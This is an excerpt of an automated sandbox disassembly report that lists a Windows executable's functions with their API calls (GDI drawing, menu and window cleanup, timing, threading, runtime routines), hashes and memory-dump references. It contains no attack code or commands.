                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3632110297-0
                                                                                                                                                    • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                                                                                                                    • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
                                                                                                                                                    • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                                                                                                                    • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                                                                                                                                                    Function 00455168 Relevance: 9.1, APIs: 6, Instructions: 75windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Destroy$DeleteMenuObject$IconWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 752480666-0
                                                                                                                                                    • Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                                                                                                                    • Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
                                                                                                                                                    • Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                                                                                                                    • Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
                                                                                                                                                    Function 004552FA Relevance: 9.1, APIs: 6, Instructions: 72windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3275902921-0
                                                                                                                                                    • Opcode ID: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                                                                                                                    • Instruction ID: 11d86efc281b6c380d974b68bd8b9632be9d9c574e85584f431c859402bfc888
                                                                                                                                                    • Opcode Fuzzy Hash: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                                                                                                                    • Instruction Fuzzy Hash: 9C217C70200A01DFC714DF39D998A6AB7E4BF49311F10862EE959C7392D778D845CB58
                                                                                                                                                    Function 004556C8 Relevance: 9.1, APIs: 6, Instructions: 67windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3275902921-0
                                                                                                                                                    • Opcode ID: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                                                                                                                    • Instruction ID: f2615e71845bffb995fe2c2b9381f89f67980fa6d4eb7dd8f13843e5971e4781
                                                                                                                                                    • Opcode Fuzzy Hash: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                                                                                                                    • Instruction Fuzzy Hash: 54213D70200A01DFD710EF25D9D4A2B37E9BF49312F10896EE945CB352D739D845CB69
                                                                                                                                                    Function 004331A2 Relevance: 9.1, APIs: 6, Instructions: 64sleepCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                                                                                                                                                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                                                                                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2833360925-0
                                                                                                                                                    • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                                                                                                                    • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                                                                                                                                                    • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                                                                                                                    • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
                                                                                                                                                    Function 004555A8 Relevance: 9.1, APIs: 6, Instructions: 61windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32 ref: 004555C7
                                                                                                                                                    • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
                                                                                                                                                    • DeleteObject.GDI32(?), ref: 00455736
                                                                                                                                                    • DeleteObject.GDI32(?), ref: 00455744
                                                                                                                                                    • DestroyIcon.USER32(?), ref: 00455752
                                                                                                                                                    • DestroyWindow.USER32(?), ref: 00455760
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3691411573-0
                                                                                                                                                    • Opcode ID: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                                                                                                                    • Instruction ID: 7bbaf3a525edecc9c7f674a1bc178dbce74773f27e06def1294b58b6a87c9b54
                                                                                                                                                    • Opcode Fuzzy Hash: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                                                                                                                    • Instruction Fuzzy Hash: 3D116071204601DBC710DF69EDC8A2A77A8FB58322F10466AFD10DB292D779D849CB68
                                                                                                                                                    Function 00447275 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                                                                      • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                                                                      • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                                                                      • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                                                                                                      • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                                                                                    • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                                                                                                                                                    • LineTo.GDI32(?,?,?), ref: 004472AC
                                                                                                                                                    • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                                                                                                                                                    • LineTo.GDI32(?,?,?), ref: 004472C6
                                                                                                                                                    • EndPath.GDI32(?), ref: 004472D6
                                                                                                                                                    • StrokePath.GDI32(?), ref: 004472E4
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 372113273-0
                                                                                                                                                    • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                                                                                                                    • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
                                                                                                                                                    • Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                                                                                                                    • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
                                                                                                                                                    Function 0044CC51 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetDC.USER32(00000000), ref: 0044CC6D
                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
                                                                                                                                                    • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                                                                                                                                                    • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CapsDevice$Release
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1035833867-0
                                                                                                                                                    • Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                                                                                                                    • Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
                                                                                                                                                    • Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                                                                                                                    • Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
                                                                                                                                                    Function 00417082 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __getptd.LIBCMT ref: 0041708E
                                                                                                                                                      • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                                                                                                                      • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                                                                                                                    • __amsg_exit.LIBCMT ref: 004170AE
                                                                                                                                                    • __lock.LIBCMT ref: 004170BE
                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                                                                                                                                                    • _free.LIBCMT ref: 004170EE
                                                                                                                                                    • InterlockedIncrement.KERNEL32(02FB17F0), ref: 00417106
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3470314060-0
                                                                                                                                                    • Opcode ID: 24516f4010ce0b93e8566e6a8de288d1d1524a4de8e6263f522fbb499f39661f
                                                                                                                                                    • Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
                                                                                                                                                    • Opcode Fuzzy Hash: 24516f4010ce0b93e8566e6a8de288d1d1524a4de8e6263f522fbb499f39661f
                                                                                                                                                    • Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
                                                                                                                                                    Function 0044B63B Relevance: 9.0, APIs: 6, Instructions: 40synchronizationthreadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                                                                                                                                                    • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                                                                                                                                                      • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                                                                                                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3495660284-0
                                                                                                                                                    • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                                                                                                                    • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
                                                                                                                                                    • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                                                                                                                    • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                                                                                                                                                    Function 00410AB0 Relevance: 9.0, APIs: 6, Instructions: 40keyboardCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                                                                                                                                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                                                                                                                                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                                                                                                                                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                                                                                                                                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                                                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Virtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4278518827-0
                                                                                                                                                    • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                                                                                                                    • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
                                                                                                                                                    • Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                                                                                                                    • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
                                                                                                                                                    Function 004151BB Relevance: 9.0, APIs: 6, Instructions: 29threadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                                                                                                                      • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                                                                                      • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                                                                                    • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                                                                                                                      • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                                                                                    • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                                                                                                                    • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                                                                                                                    • ExitThread.KERNEL32 ref: 004151ED
                                                                                                                                                    • __freefls@4.LIBCMT ref: 00415209
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 442100245-0
                                                                                                                                                    • Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                                                                                                                    • Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
                                                                                                                                                    • Opcode Fuzzy Hash: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                                                                                                                    • Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669
                                                                                                                                                    Function 0045F790 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 216windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                                                                      • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                                                                    • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                                                                                                                                                    • _wcslen.LIBCMT ref: 0045F94A
                                                                                                                                                    • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                                                                                                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                    • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
